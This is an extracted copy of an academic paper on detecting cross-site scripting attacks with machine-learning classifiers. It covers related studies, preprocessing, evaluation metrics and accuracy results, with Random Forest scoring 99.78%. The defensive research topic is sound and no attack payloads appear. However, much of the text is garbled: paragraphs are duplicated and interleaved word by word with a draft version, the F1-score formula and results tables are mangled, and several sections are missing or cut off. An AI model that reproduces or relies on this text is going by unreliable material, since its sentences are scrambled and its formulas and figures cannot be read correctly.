Information 15 00420
Information 15 00420
Information 15 00420
Article
Machine Learning-Driven Detection of Cross-Site Scripting Attacks
Rahmah Alhamyani * and Majid Alshammari *
College of Computer and Information Technology, Taif University, Taif 26571, Saudi Arabia
* Correspondence: rahooma88@hotmail.com (R.A.); m.alshammari@tu.edu.sa (M.A.)
Keywords: cross-site scripting attacks; machine learning; deep learning; artificial neural networks;
web security; web vulnerabilities; attack detection; feature selection
Figure
Figure1.1.Vulnerability staticsreport
Vulnerability statics report2023
2023byby EdgeScan.
EdgeScan.
Webapplication
Web application security
security focuses
focuseson onidentifying
identifying andandaddressing
addressing security vulnerabil-
security vulnerabili-
ities at the web application level, along with implementing effective solutions for these
ties at the web application level, along with implementing effective solutions for these
flaws [10]. Web security is essential for businesses because websites and web servers are
flaws [10]. Web security is essential for businesses because websites and web servers are
vulnerable to internal and external threats. Strict policy measures must be implemented to
vulnerable to internal
avoid manipulation and external
or unwanted threats.
access Strictdata
to sensitive policy measures which
or destruction, must be couldimplemented
harm
tothe
avoid manipulation
company’s operations or or
unwanted
reputation. access
Onlinetosecurity
sensitive data orinclude
principles destruction, which could
authentication,
harm the company’s
authorization, auditing,operations
and logging or reputation.
[11]. SecurityOnline security
is essential principles
for a secure include authen-
web application.
State integrity
tication, refers to maintaining
authorization, auditing, and thelogging
application’s
[11]. state, which
Security is should
essential be kept
for auntam-
secure web
pered; logic State
application. correctness means
integrity that the
refers logic of the application
to maintaining should be precisely
the application’s state, whichcorrected
should be
kept untampered; logic correctness means that the logic of the application should itbe pre-
as intended by the developers; input validity means that user input is verified before
is used; and security misconfiguration refers to configuration settings and using secure
cisely corrected as intended by the developers; input validity means that user input is
components. For online applications to guarantee the authenticity and responsiveness of
verified before it is used; and security misconfiguration refers to configuration settings
user inputs, input validation is essential. Both client-side and server-side inputs, such as
and using post
HTML5, secure components.
message invocations,For POST
onlinemethod,
applications
database to guarantee
queries, andthe authenticity
HTTP request and
responsiveness of user inputs, input
query strings, should be subject to validation [5]. validation is essential. Both client-side and server-
side inputs, such as HTML5,
XSS represents a pervasive post message
threat in theinvocations, POST method,
realm of cybersecurity, database
characterized asqueries,
a
andclient-side code injection
HTTP request queryattack
strings,that exploits
should bevulnerabilities in both client-side
subject to validation [5]. and server-
sideXSS
components
represents of web applications
a pervasive [12]. In
threat insuch
the attacks,
realm of attackers leverage resources
cybersecurity, from as a
characterized
third-party websites to launch scripts within the victim’s browser environment.
client-side code injection attack that exploits vulnerabilities in both client-side and server- Typically,
attackers directly insert payloads containing Java Script (JS) into the database of a targeted
side components of web applications [12]. In such attacks, attackers leverage resources
website. Subsequently, when a user requests a page from the compromised website, the
from third-party websites to launch scripts within the victim’s browser environment. Typ-
malicious script-containing page is delivered to the victim’s browser, wherein the attacker’s
ically,
payloadattackers directly
is executed as partinsert
of thepayloads
Hypertextcontaining
Markup LanguageJava Script
(HTML) (JS)body.
into This
the database
method of a
targeted
allows attackers to manipulate user interactions, steal sensitive information, or compromise web-
website. Subsequently, when a user requests a page from the compromised
site,
thethe malicious
integrity of webscript-containing
applications [8]. page is delivered
Furthermore, to theexploit
attackers victim’s browser, wherein
vulnerabilities that the
attacker’s
are publiclypayload is executed
disclosed as part
before patches areof the Hypertext
developed Markupenabling
and deployed, Language (HTML) body.
unauthorized
access
This to systems
method allows and the unauthorized
attackers to manipulatealteration
userorinteractions,
theft of data [13].
stealFigure 2 illustrates
sensitive information,
the general XSS attacks.
or compromise the integrity of web applications [8]. Furthermore, attackers exploit vul-
By inserting additional HTML or client script code into a website or input form,
nerabilities that are publicly disclosed before patches are developed and deployed, ena-
attackers can compromise the security of users’ browsers, gaining unauthorized access to
bling unauthorized access to systems and the unauthorized alteration or theft of data [13].
sensitive data such as cookies, session tokens, etc. [12,14]. This malicious script, capable of
Figure 2 illustrates
rewriting HTML text, theenables
general XSS attacks.
attackers to compromise user security, extract sensitive data,
or even deploy harmful software [15].
Figure 3 illustrates the two primary types of XSS vulnerabilities [15,16]:
Client-side (Document Object Model (DOM)-based XSS);
Server-side (persistent and non-persistent XSS).
Information 2024, 15, x FOR PEER REVIEW
Information 2024, 15, 420 3 of 20
Figure2.2.The
Figure The depiction
depiction of theofgeneral
the general XSS
XSS attack attack
scenario. scenario.
(URLs) containing unfiltered text that executes upon user interaction. The repercussions of
successful XSS payloads include cookie theft, keylogging, session hijacking, and identity
theft [16].
Despite the widespread adoption of standardized code development practices, over
60% of websites remain vulnerable to XSS attacks, highlighting the critical need for robust
detection and prevention mechanisms [20]. Identifying and thwarting XSS attacks are
paramount for safeguarding web applications and protecting sensitive user data. To this
end, various analysis techniques have been employed, including static analysis, dynamic
analysis, and machine learning (ML). Static analysis involves scrutinizing the source code
to detect vulnerabilities, offering assurances regarding specific vulnerability absence but
potentially requiring extensive time and yielding limited results [21]. Conversely, dy-
namic analysis focuses on understanding script behavior during execution, facilitating the
identification of unknown vulnerabilities and novel attack types that static analysis may
overlook [21].
Traditional methods for XSS detection often suffer from high false-positive (FP) rates,
meaning that they flag harmless activity as malicious. Additionally, these methods may
struggle to adapt to new attack vectors employed by cybercriminals. ML, on the other
hand, leverages existing script data to create classifiers and predict the behavior of new
scripts, offering the rapid identification of malicious scenarios, adaptability to evolving
attack types, and the ability to operate across diverse application environments without
the need for a dedicated analysis environment [21].
The integration of ML into XSS detection frameworks holds significant promise,
enabling enhanced threat detection capabilities and proactive defense measures against
evolving cyber threats. This paper explores the effectiveness and benefits of ML-based
XSS detection methods, highlighting their potential to bolster web application security and
mitigate the risk of XSS attacks.
This research has several key objectives:
1. Create an ML-based model: We provide an ML model that greatly enhances the
precision and potency of XSS detection in web applications.
2. Identify ideal features: To guarantee the accurate detection of XSS attacks while
reducing false alarms, we seek to identify the best traits and data sources for ML
model training.
3. Assess the efficacy of ML-based detection systems: We will evaluate the ML-based
approach’s accuracy, efficiency, and reliability by comparing it with state-of-the-art
detection techniques.
4. Examine current methods: We will quickly summarize current ML and deep learning
(DL) algorithms that have been applied to XSS detection.
This research addresses these challenges by proposing a novel ML-based system
for XSS attack detection. Our aim is to enhance web application security by developing
a more accurate, robust, and adaptable detection system. By reducing the number of
FPs and effectively identifying XSS attacks, this research contributes significantly to the
improvement in web application security practices.
We develop and assess the effectiveness of ML-based methods, including Decision
Trees (DTs), Support Vector Machines (SVMs), Random Forest (RF), Logistic Regression
(LR), Extreme Gradient Boosting (XGBoost), Multi-Layer Perceptron (MLP), Convolutional
Neural Networks (CNNs), Artificial Neural Networks (ANNs), and ensemble learning
with feature selection techniques such as Information Gain (IG) and Analysis of Variance
(ANOVA) to identify the most relevant features and enhance the accuracy and efficiency of
identifying XSS in web applications. The experiment is conducted using the XSS dataset
that was published by Mokbal et al. [22]. We selected the top 25 features using IG as a
feature selection technique to choose the most informative features.
After a comparative analysis of the ten models’ performance, the RF, ensemble model
of RF, DTs with Gradient Boost (GB), and ensemble mode of RF with MLP, respectively,
scored 99.78%, 99.76%, and 99.65% in terms of accuracy and achieved high results in the
Information 2024, 15, 420 5 of 20
other evaluation metrics. The proposed models provide significant performance improve-
ments compared to other existing state-of-the-art methods as they can detect XSS-based
attacks while simultaneously minimizing FP and false-negative (FN) rates. Moreover,
the proposed method is compared with other existing state-of-the-art XSS attack detec-
tion methods.
The remainder of this paper is organized as follows. Section 2 presents different
methods for XSS attack detection, followed by the proposed research methodology in
Section 3. Sections 4 and 5 present the results and discussion, respectively. Finally, Section 6
contains the conclusion.
2. Related Work
ML approaches have emerged as a promising avenue for XSS attack detection in web
applications. Their ability to learn from data and adapt to evolving attack patterns offers
significant advantages over traditional methods [23]. However, selecting the most effective
preprocessing techniques is crucial to optimize detection performance [23].
Several studies have explored various ML algorithms for XSS detection. Banerjee
et al. [24] implemented ML algorithms for identifying XSS threats. These algorithms include
SVMs, KNN, RF, and LR. The LR model was utilized to map the true and false values
included in the dataset. The implementation of the suggested model used a dataset with
24 attributes based on JS and URL features. Among these, 1453 samples were benign,
while 158 were flagged as malicious. They achieved the highest accuracy of 98% for the RF
classifier. Similarly, Habibi and Surantha [12] proposed a method to enhance XSS attack
detection performance by using different ML techniques with an n-gram approach to script
features. These techniques include SVMs, KNN, and NB. The results demonstrate that
SVMs and the n-gram method work together to reach the maximum accuracy and achieve
an accuracy of 98%. Kascheev and Olenchikova [21] compared various ML algorithms
such as the SVMs, DTs, NB, and LR classifier, with DTs achieving the highest accuracy of
98.81%. While these studies demonstrate the effectiveness of ML, they also highlight the
importance of feature selection, as evidenced by the lower performance of LR in Kascheev
and Olenchikova’s work [21].
Gogoi et al. [25] proposed a hybrid approach combining traditional Web Application
Firewalls with ML algorithms like SVMs. Their focus on reducing FPs and FNs while
maintaining high precision yielded promising results of 98%. They discovered that SVMs
successfully distinguished inputs from XSS attacks and legitimate web applications with a
balance between precision and accuracy. Mokbal et al. [22] introduced the XGBXSS frame-
work, utilizing XGBoost and a hybrid feature selection technique consisting of sequential
backward selection (SBS) combined with Information Gain (IG) to choose an optimal subset
while lowering computing expenses and preserving the good performance of the detec-
tor. Also, the study’s dataset included 138,569 samples, with 100,000 samples classified
as benign. This ensemble learning approach achieved exceptional performance with an
accuracy of 99.59%, precision of 99.53%, and a low FP rate of 0.18%.
Research on hybrid models for XSS detection is also gaining traction. Stiawan et al. [26]
combined Long Short-Term Memory (LSTM) with Principal Component Analysis (PCA)
for dimensionality reduction, achieving 96.85% accuracy. Other studies explored combina-
tions of LSTM and CNNs [27] or CNNs and scanners [28] to achieve high accuracy rates
exceeding 99%. Melicher et al. [29] proposed a method integrating three-layer Deep Neural
Networks (DNN) with taint tracking for DOM XSS detection, achieving 95% accuracy
but with limitations in precision, achieving 26.7%. Alaoui et al. [30] utilized an LSTM
Encoder–Decoder with word embeddings including tools like word2vec, FastText, and
Glove for XSS attack detection, reaching a precision of 99.09% and recall and accuracy of
99.08% each.
Gupta et al. [31] presented GeneMiner, a system for detecting novel XSS attacks. It
consists of GeneMiner-E for extracting new features and GeneMiner-C for classifying input
payloads as either malicious or benign. GeneMiner responds to changing patterns of attack
Information 2024, 15, 420 6 of 20
payloads to detect adversarial XSS attacks. They evaluate their classification accuracy by
comparing it with NB, RF, LR, SVMs, AdaBoost, MLP, CNNs, and reinforcement learning.
Their approach achieved an accuracy of 98.5% in identifying newly crafted malicious
payloads. Dawadi et al. [32] conducted a comparative analysis using LSTMs for Distributed
Denial of Service (DDoS), XSS, and SQL injection detection, achieving an accuracy of 89.34%
for XSS attacks within their layered architecture model.
The relevance of XSS attack detection extends beyond web applications to Internet
of Things (IoT) devices and cloud-based services. Tian et al. [33] proposed a CNN-based
method for edge devices that can be used with cloud-based web applications. The sug-
gested model used the Continuous Bag of Words (CBOWs) model to vectorize URLs during
the data preparation phase. The Rectified Linear Unit (ReLU) function, dropout layers, and
pooling layers are used in the CNN architecture to optimize the CNN model, achieving an
accuracy of 99.41%. Chaudhary et al. [34] introduced a CNN-based approach for identifying
XSS attacks. The suggested approach applies CNNs after two stages of data preparation,
specifically decoding and contextual tagging. Their work has been implemented in Fog
nodes connected with IoT networks, achieving an accuracy of 99.88%. Luo et al. [35] pro-
posed an Ensemble DL-Based Web Attack Detection System (EDL-WADS) for online attack
detection in IoT networks. The suggested model examined URL requests for abnormalities,
and it used a combination of three DL-based models, namely Multimodal Residual Net-
works (MRNs), CNNs, and LSTM, achieving 98% accuracy. Finally, Odun-Ayo et al. [36]
explored MLP for real-time XSS detection in cloud-based web applications, achieving an
accuracy of 99.47%.
Furthermore, several recent studies have introduced novel approaches to detecting
XSS attacks, leveraging advanced techniques such as attention mechanisms, generative
adversarial networks (GANs), and Monte Carlo Tree Search (MCTS) algorithms to enhance
detection accuracy and robustness. For instance, [37] proposed the LSTM-attention detec-
tion model, integrating an attention mechanism into the LSTM recurrent neural network
(RNN) architecture. Achieving remarkable precision and recall rates of 99.3% and 98.2%,
respectively, their method demonstrated superior performance in identifying XSS attacks by
enhancing the recognition of malicious codes and feature extraction. In a similar vein, [38]
introduced the Paths Attention Method (PATS) for detecting reflected XSS vulnerabilities,
utilizing syntactic pathways and attention processes to improve training effectiveness.
PATS achieved an accuracy rate of 90.25% and an F1-Score of 81.62% while also addressing
dataset limitations through the creation of a reliable dataset consisting of 10,000 benign
samples from GitHub and 1000 malicious samples from the National Institute of Standards
and Technology (NIST). Additionally, [39] employed the MCTS algorithm and GANs to
generate adversarial XSS attacks, enhancing the detection rate of adversarial examples.
Their method significantly improved the detector’s performance by increasing the rate
of discovering adversarial samples. Meanwhile, [40] emphasized the susceptibility of DL
models to adversarial attacks and proposed a GAN-based approach to automatically gener-
ate hostile XSS attacks against an LSTM-based XSS attack detection model. It demonstrated
a significant decline in the detection model’s performance when tested on modified XSS
instances produced by the GAN model and achieved an accuracy of 98%.
Tariq et al. [41] introduced a hybrid methodology combining genetic algorithms, statis-
tical inference, and reinforcement learning (RL) to assess the proximity of each payload to
malicious and benign samples, offering a novel approach by merging ML with metaheuris-
tic algorithms like the genetic algorithm, achieving an accuracy of 99.89%. Thajeel et al. [42]
addressed the evolving nature of XSS attacks and feature drift using a deep Q-network
multi-agent framework (DQN-MAFS) for dynamic feature selection, achieving an accuracy
of 98.37%. Their proposed approach, called fair agent reward distribution-based dynamic
feature selection (FARD-DFS), outperformed existing methods in terms of accuracy and
F1 measure, providing real-time updates and correction of embedded knowledge without
the need for offline retraining.
based dynamic feature selection (FARD-DFS), outperformed existing methods i
accuracy and F1 measure, providing real-time updates and correction of e
knowledge without the need for offline retraining.
Information 2024, 15, 420
These studies showcase the effectiveness of various ML and DL approach
7 of 20
attack detection. They highlight the importance of feature selection, ensembl
techniques, and the exploration of novel architectures like CNNs and LSTMs for
highThese studiesand
accuracy showcase the effectiveness
adapting to evolving of various
attackML and DL However,
vectors. approaches for XSS
challenges s
attack detection. They highlight the importance of feature selection, ensemble learning
lack of standardized datasets, adaptation to emerging attack vectors, and re
techniques, and the exploration of novel architectures like CNNs and LSTMs for achieving
rates persist,and
high accuracy indicating
adapting tothe needattack
evolving for further researchchallenges
vectors. However, in this field.
such asOur
the resea
upon this foundation
lack of standardized byadaptation
datasets, proposing a novelattack
to emerging ML-based
vectors,model that leverages
and reducing FP rates the
persist, indicating the need for further research
to further enhance XSS attack detection performance. in this field. Our research builds upon this
foundation by proposing a novel ML-based model that leverages these insights to further
enhance XSS attack detection performance.
3. Research Methodology
3. Research Methodology
This section outlines the methodology employed in conducting research
This section outlines the methodology employed in conducting research on XSS attack
tack detection utilizing ML techniques and comparison to other state-of-the-art
detection utilizing ML techniques and comparison to other state-of-the-art methods. The
The methodology
methodology encompasses
encompasses data
data collection, collection,
preprocessing, preprocessing,
feature selection, modelfeature
training, selecti
training, and Figure
and evaluation. evaluation. Figure
4 illustrates 4 illustrates
the proposed theframework.
models’ proposed models’ framework.
3.2. Preprocessing
Before training the models, the dataset undergoes preprocessing to ensure uniformity
and relevance. This step involves cleaning the data, handling missing values, class im-
balance, and standardizing formats. We handled the class imbalance by upsampling the
minority class, which involves increasing the number of samples in the minority class to bal-
ance it with the majority class. By dropping duplicates, the XSS dataset is streamlined and
ready for subsequent processing steps, including train–test splitting. Furthermore, we used
the standard scalar technique in Python language as feature scaling. Moreover, challenges
like the presence of irrelevant features are addressed through feature selection techniques.
3.5. Evaluation
The performance of each trained model is evaluated to determine its effectiveness in
detecting XSS attacks. Evaluation metrics such as accuracy, precision, recall, F1-Score, Re-
ceiver Operating Characteristic—Area Under the Curve (ROC-AUC) score, and confusion
matrix are used to assess the models’ performance [23]. The evaluation process provides
insights into the strengths and weaknesses of each model, guiding the selection of the most
suitable approach for XSS attack detection.
3.5.1. Accuracy
Accuracy is a metric for assessing the potency of a classification model. It shows the
proportion of accurately classified samples out of all the samples that have been classified,
as shown in Equation (1).
TP + TN
Acc = (1)
TP + TN + FP + FN
3.5.2. Precision
Precision serves as a metric for assessing the ability of a model to predict positive
samples. The total number of positive samples indicates the ratio of correctly predicted
samples (TP), as shown in Equation (2).
TP
Precision = (2)
TP + FP
3.5.3. Recall
Recall is a metric that assesses the ability of a model to identify positive samples. The
quantity of positive samples that indicate that the prediction was an accurate true positive
(TP) divided by the total number of samples in the same real class is what this indicates. It
serves as an example of the model’s FN, as shown in Equation (3).
TP
Recall = (3)
TP + FN
3.5.4. F1-Score
The F1 measure is sometimes referred to as the harmonic mean of recall and precision
because it considers both metrics and provides a fair evaluation of their performance. This
assessment metric is commonly used when datasets are uneven, meaning that one class
has a much higher number of occurrences than the other, as shown in Equation (4).
1
F1-score = (4)
∝ · 1p + (1 − α)· R1
Information 2024, 15, 420 11 of 20
3.5.5. ROC-AUC
ROC-AUC is a popular function in ML for assessing the performance of binary classi-
fication models. It computes the ROC-AUC. The ROC-AUC score goes from 0 to 1, with
1 representing perfect classification and 0.5 indicating random guessing. A score higher
than 0.5 indicates that the model outperforms random.
As XSS attacks evolve in complexity with advancements in web applications, this
research acknowledges the challenges posed by obfuscation techniques and semantic
reasoning in attack statements. The methodology is designed to address these challenges
by employing robust preprocessing, feature selection, and model training techniques to
enhance the detection of XSS vulnerabilities in web applications.
4. Results
The experimental results, as depicted in Table 3, underscore the efficacy of employing
diverse ML approaches in XSS attack detection, signifying a significant advancement in
web security measures. Moreover, the proposed method is benchmarked against existing
state-of-the-art XSS attack detection methods, offering a comparative analysis to gauge its
performance and efficacy.
All experiments were meticulously conducted within the Google Colab environment,
ensuring consistency and reproducibility in training and testing the models. In the sub-
sequent sections, a detailed exploration of the empirical findings unfolds, shedding light
on various aspects, including model performance, feature importance, computational
efficiency, and broader implications for bolstering web security against XSS vulnerabilities.
Through this comprehensive analysis, valuable insights are gleaned, paving the way
for the development of enhanced detection mechanisms and resilient defense strategies
in the dynamic landscape of web security. We applied various ML models, outlined in
the following.
indicative of the model’s ability to distinguish between classes, stood at 97%, highlighting
its robustness in discriminating between benign and malicious instances. The confusion ma-
trix provides additional insights into the LR classifier’s performance, revealing a minimal
misclassification rate of 0.22% for benign instances and 5.68% for malicious instances.
5. Discussion
In summary, the comprehensive evaluation of all the proposed models in our research,
as depicted in Figures 5 and 6, underscores the effectiveness of various ML techniques for
XSS attack detection. Among these models, the RF model emerges as the top-performing
one, exhibiting the highest accuracy and balanced performance across all evaluation metrics.
Nevertheless, other models such as XGBoost also demonstrate competitive performance,
showcasing the versatility and efficacy of diverse ML approaches in addressing XSS vul-
nerabilities. The ensemble models, combining multiple classifiers, further accentuate the
potential benefits of leveraging ensemble techniques to enhance predictive performance.
These findings offer valuable insights for both researchers and practitioners in the cyber-
performing one, exhibiting the highest accuracy and balanced performance across all eval-
uation metrics. Nevertheless, other models such as XGBoost also demonstrate competitive
performance, showcasing the versatility and efficacy of diverse ML approaches in ad-
Information 2024, 15, 420
dressing XSS vulnerabilities. The ensemble models, combining multiple classifiers, further
15 of 20
accentuate the potential benefits of leveraging ensemble techniques to enhance predictive
performance. These findings offer valuable insights for both researchers and practitioners
in the cybersecurity
security domain,
domain, guiding theguiding the development
development of more robustofand
more robust
effective XSSand effective XSS
detection
detection
systemssystems toweb
to bolster bolster webmeasures
security securityand
measures
mitigate and
cybermitigate cyber threats effectively
threats effectively.
Figure 6. Confusion
Figure matrix
6. Confusion matrixof
of the proposedmodels.
the proposed models.
167 features and exhibited lower performance compared to ours, suggesting potential
limitations in their approach or dataset. Additionally, they re-implemented a combination
of genetic algorithm, statistical inference, and RL introduced by Tariq et al. [41] for XSS
attack detection.
Our experimental results, as depicted in Table 4 and Figure 7, demonstrate that our
proposed methods, along with the method presented by Mokbal et al. [22], achieved the
highest accuracy and precision rates. Furthermore, our proposed methods, including RF,
ensemble learning models RF and GB with DTs, and MLP with RF, as well as the method
from Tariq et al. [41], attained the best recall rates, ranging from 99.54% to 99.77%. These
results signify the robustness and effectiveness of our proposed methods in detecting XSS
attacks. Among the three proposed models, RF achieved exceptional results in terms of
accuracy, precision, and F1-Score; however, in terms of recall, the ensemble learning models
RF and GB with DTs achieved higher results. In general, the three proposed models yielded
higher results in all evaluation metrics than the existing studies.
Author No. of
Feature Accuracy Precision Recall F1-Score
Algorithms Selected
Selection Method (%) (%) (%) (%)
Features
Hybrid (IG and
Mokbal et al. [22] (2021) 30 99.59 99.50 99.01 99.27
XGBoost SBS)
Thajeel et al. [42] (2023) DTs Dynamic 167 98.81 98.16 97.70 97.84
Genetic algorithm,
statistical inference,
Tariq et al. [41,42] (2023) - 167 95.38 95.93 99.54 95.20
and reinforcement
learning
RF 99.78 99.80 99.75 99.78
nformation Our
2024, 15, x FOR
proposed PEER REVIEW
models DT and RF with GB IG 25 99.76 99.74 99.77 99.76 17 of 20
MLP with RF 99.65 99.59 99.71 99.65
Table 4. Results
Overall,comparison with
our findings state-of-the-art
underscore methods. made in XSS attack detection
the advancements
through ML techniques, emphasizing the importance of algorithm selection and feature
Methodology Features Evaluation Metrics
No. of
Author Feature Accuracy Precision Recall F1-Score
Algorithms Selected
Selection Method (%) (%) (%) (%)
Features
Hybrid (IG and
Information 2024, 15, 420 17 of 20
engineering in developing accurate and robust detection models. By achieving superior per-
formance compared to existing methods, our research contributes significantly to enhancing
web security measures and mitigating cyber threats effectively.
6. Conclusions
In conclusion, the escalating complexity of XSS attacks underscores the urgency for
robust detection mechanisms. As attackers increasingly employ obfuscation techniques
to evade detection, traditional methods struggle to keep pace. However, leveraging ML
proves to be a potent strategy in combating this evolving threat landscape. ML models
offer a more resilient and dynamic protection against malicious code injections because
they can learn from enormous volumes of data, adjust to changing attack patterns, and
generalize to uncommon circumstances.
This research proposes a unique framework model for XSS attack detection using a
comprehensive suite of ML algorithms. Our experimentation encompassed DTs, SVMs, RF,
LR, XGboost, MLP, CNNs, ANNs, and ensemble learning techniques. Through rigorous
evaluation of a dataset of recent real-world traffic, augmented by feature selection methods
like IG and ANOVA, we identified the most effective models.
Among the ten models examined, the RF model emerged as the top performer, achiev-
ing an accuracy score of 99.78%. Additionally, ensemble models combining RF with DTs
and GB, as well as ensemble models integrating RF with MLP, demonstrated high accuracy
scores of 99.76% and 99.65%, respectively, alongside robust performance across various
evaluation criteria. Notably, these proposed models outperformed previous state-of-the-art
methods, effectively detecting XSS-based attacks while minimizing FPs and FNs.
Looking ahead, our future work will focus on further enhancing these top-performing
models to detect other types of web application attacks, such as SQL injection. By con-
tinuing to innovate and refine our approach, we aim to fortify web security measures
and stay ahead of emerging cyber threats in an ever-evolving digital landscape. The ML
models will be implemented using a large-scale dataset which will improve overall data
protection, decrease FPs, and improve real-time monitoring with their smart, adaptable,
Information 2024, 15, 420 18 of 20
and effective detection capabilities. They maximize resource use, promote creativity, and
may be incorporated into larger security policies. In the end, the ML models are a big step
forward in safeguarding sensitive data and web applications from SQL injection attacks
and other online threats.
Author Contributions: Conceptualization, R.A. and M.A.; methodology, R.A. and M.A.; formal
analysis, R.A. and M.A.; investigation, R.A. and M.A.; writing—original draft, R.A.; visualization,
R.A.; supervision, M.A.; funding acquisition, M.A. All authors have read and agreed to the published
version of the manuscript.
Funding: The authors extend their appreciation to Taif University, Saudi Arabia, for supporting this
work through project number (TU-DSPP-2024-286).
Data Availability Statement: This work utilizes the freely accessible XSS dataset that can be found
in [22].
Acknowledgments: The authors extend their appreciation to Taif University, Saudi Arabia, for
supporting this work through project number (TU-DSPP-2024-286).
Conflicts of Interest: The authors declare no conflicts of interest.
References
1. Sotnik, S.; Shakurova, T.; Lyashenko, V. Development Features Web-Applications. 2023. Available online: www.ijeais.org/ijaar
(accessed on 13 June 2024).
2. Prasetio, D.A.; Kusrini, K.; Arief, M.R. Cross-site Scripting Attack Detection Using Machine Learning with Hybrid Features. J.
Infotel 2021, 13, 1–6. [CrossRef]
3. Bielova, N. Survey on JavaScript security policies and their enforcement mechanisms in a web browser. J. Log. Algebr. Program.
2013, 82, 243–262. [CrossRef]
4. Dasgupta, D.; Akhtar, Z.; Sen, S. Machine learning in cybersecurity: A comprehensive survey. J. Def. Model. Simul. 2022, 19,
57–106. [CrossRef]
5. Chaudhari, G.R.; Vaidya, M.V. A Survey on Security and Vulnerabilities of Web Application. 2014. Available online: www.ijcsit.
com (accessed on 13 June 2024).
6. Parashar, P.; Srivastava, P. An Analysis of XSS Vulnerabilities and Prevention of XSS Attacks in Web Applications. Available
online: https://www.researchgate.net/publication/371724261_An_Analysis_of_XSS_Vulnerabilities_and_Prevention_of_XSS_
Attacks_in_Web_Applications (accessed on 3 January 2024).
7. Nir, O. “OWASP Top Ten 2023—The Complete Guide”, Reflectiz. Available online: https://www.reflectiz.com/blog/owasp-top-
ten-2023/ (accessed on 9 October 2023).
8. Kaur, J.; Garg, U.; Bathla, G. Detection of cross-site scripting (XSS) attacks using machine learning techniques: A review. Artif.
Intell. Rev. 2023, 56, 12725–12769. [CrossRef]
9. Edgescan. Vulnerability Statistics Snapshot. January 2022. Available online: https://www.edgescan.com/january-2022
-vulnerability-statistics-snapshot/ (accessed on 10 August 2023).
10. Erşahin, B.; Erşahin, M. Web application security. South Fla. J. Dev. 2022, 3, 4194–4203. [CrossRef]
11. Awad, M.; Ali, M.; Takruri, M.; Ismail, S. Security vulnerabilities related to web-based data. Telkomnika (Telecommun. Comput.
Electron. Control) 2019, 17, 852–856. [CrossRef]
12. Habibi, G.; Surantha, N. XSS Attack Detection with Machine Learning and n-Gram Methods; Institute of Electrical and Electronics
Engineers: Los Alamitos, CA, USA, 2020.
13. Sarker, I.H. Multi-aspects AI -based modeling and adversarial learning for cybersecurity intelligence and robustness: A compre-
hensive overview. Secur. Priv. 2023, 6, e295. [CrossRef]
14. Stency, V.S.; Mohanasundaram, N. A Study on XSS Attacks: Intelligent Detection Methods. In Journal of Physics: Conference Series,
Volume 1767, International E-Conference on Data Analytics, Intelligent Systems and Information Security & ICDIIS 2020, Pollachi, India,
11–12 December 2020; IOP Publishing Ltd.: Bristol, UK, 2021. [CrossRef]
15. Marashdih, A.W.; Zaaba, Z.F.; Suwais, K.; Mohd, N.A. Web application security: An investigation on static analysis with other
algorithms to detect cross site scripting. Procedia Comput. Sci. 2019, 161, 1173–1181. [CrossRef]
16. Cheah, C.S.; Selvarajah, V. A Review of Common Web Application Breaching Techniques (SQLi, XSS, CSRF). In Proceedings of
the 3rd International Conference on Integrated Intelligent Computing Communication & Security (ICIIC 2021), Bangalore, India,
6–7 August 2021.
17. Liu, M.; Zhang, B.; Chen, W.; Zhang, X. A Survey of Exploitation and Detection Methods of XSS Vulnerabilities. IEEE Access 2019,
7, 182004–182016. [CrossRef]
18. Rodríguez, G.E.; Torres, J.G.; Flores, P.; Benavides, D.E. Cross-site scripting (XSS) attacks and mitigation: A survey. Comput. Netw.
2020, 166, 106960. [CrossRef]
Information 2024, 15, 420 19 of 20
19. Hickling, J. What Is DOM XSS and Why Should You Care? Comput. Fraud Secur. 2021, 4, 6–10. [CrossRef]
20. Panwar, P.; Mishra, H.; Patidar, R. An Analysis of the Prevention and Detection of Cross Site Scripting Attack. Int. J. Emerg. Trends
Eng. Res. 2023, 11, 30–34. [CrossRef]
21. Kascheev, S.; Olenchikova, T. The Detecting Cross-Site Scripting (XSS) Using Machine Learning Methods. In Proceedings of the
2020 Global Smart Industry Conference, GloSIC 2020, Chelyabinsk, Russia, 17–19 November 2020; Institute of Electrical and
Electronics Engineers Inc.: Los Alamitos, CA, USA, 2020; pp. 265–270. [CrossRef]
22. Mokbal, F.M.M.; Dan, W.; Xiaoxi, W.; Wenbin, Z.; Lihua, F. XGBXSS: An Extreme Gradient Boosting Detection Framework for
Cross-Site Scripting Attacks Based on Hybrid Feature Selection Approach and Parameters Optimization. J. Inf. Secur. Appl. 2021,
58, 102813. [CrossRef]
23. Thajeel, I.K.; Samsudin, K.; Hashim, S.J.; Hashim, F. Machine and Deep Learning-based XSS Detection Approaches: A Systematic
Literature Review. J. King Saud Univ.—Comput. Inf. Sci. 2023, 35, 101628. [CrossRef]
24. Banerjee, R.; Baksi, A.; Singh, N.; Bishnu, S.K. Detection of XSS in web applications using Machine Learning Classifiers. In
Proceedings of the 2020 4th International Conference on Electronics, Materials Engineering and Nano-Technology, IEMENTech
2020, Kolkata, India, 2–4 October 2020; Institute of Electrical and Electronics Engineers Inc.: Los Alamitos, CA, USA, 2020.
[CrossRef]
25. Gogoi, B.; Ahmed, T.; Saikia, H.K. Detection of XSS Attacks in Web Applications: A Machine Learning Approach. Int. J. Innov.
Res. Comput. Sci. Technol. 2021, 9, 1–10. [CrossRef]
26. Stiawan, D.; Bardadi, A.; Afifah, N.; Melinda, L.; Heryanto, A.; Septian, T.W.; Idris, M.Y.; Subroto, I.M.; Budiarto, R. An Improved
LSTM-PCA Ensemble Classifier for SQL Injection and XSS Attack Detection. Comput. Syst. Sci. Eng. 2023, 46, 1759–1774.
[CrossRef]
27. RKadhim, W.; Gaata, M.T. A hybrid of CNN and LSTM methods for securing web application against cross-site scripting attack.
Indones. J. Electr. Eng. Comput. Sci. 2020, 21, 1022–1029. [CrossRef]
28. Buz, B.; Gülçiçek, B.; Bahtiyar, Ş. A Hybrid Machine Learning Model to Detect Reflected XSS Attack. Balk. J. Electr. Comput. Eng.
2021, 9, 235–241. [CrossRef]
29. Melicher, W.; Fung, C.; Bauer, L.; Jia, L. Towards a lightweight, hybrid approach for detecting DOM XSS vulnerabilities with
machine learning. In Proceedings of the Web Conference 2021—Proceedings of the World Wide Web Conference, WWW 2021,
Ljubljana, Slovenia, 12–16 April 2021; Association for Computing Machinery, Inc.: New York, NY, USA, 2021; pp. 2684–2695.
[CrossRef]
30. Lamrani Alaoui, R.; Habib Nfaoui, E. Cross Site Scripting Attack Detection Approach Based on LSTM Encoder-Decoder and
Word Embeddings. 2023. Available online: www.ijisae.org (accessed on 13 June 2024).
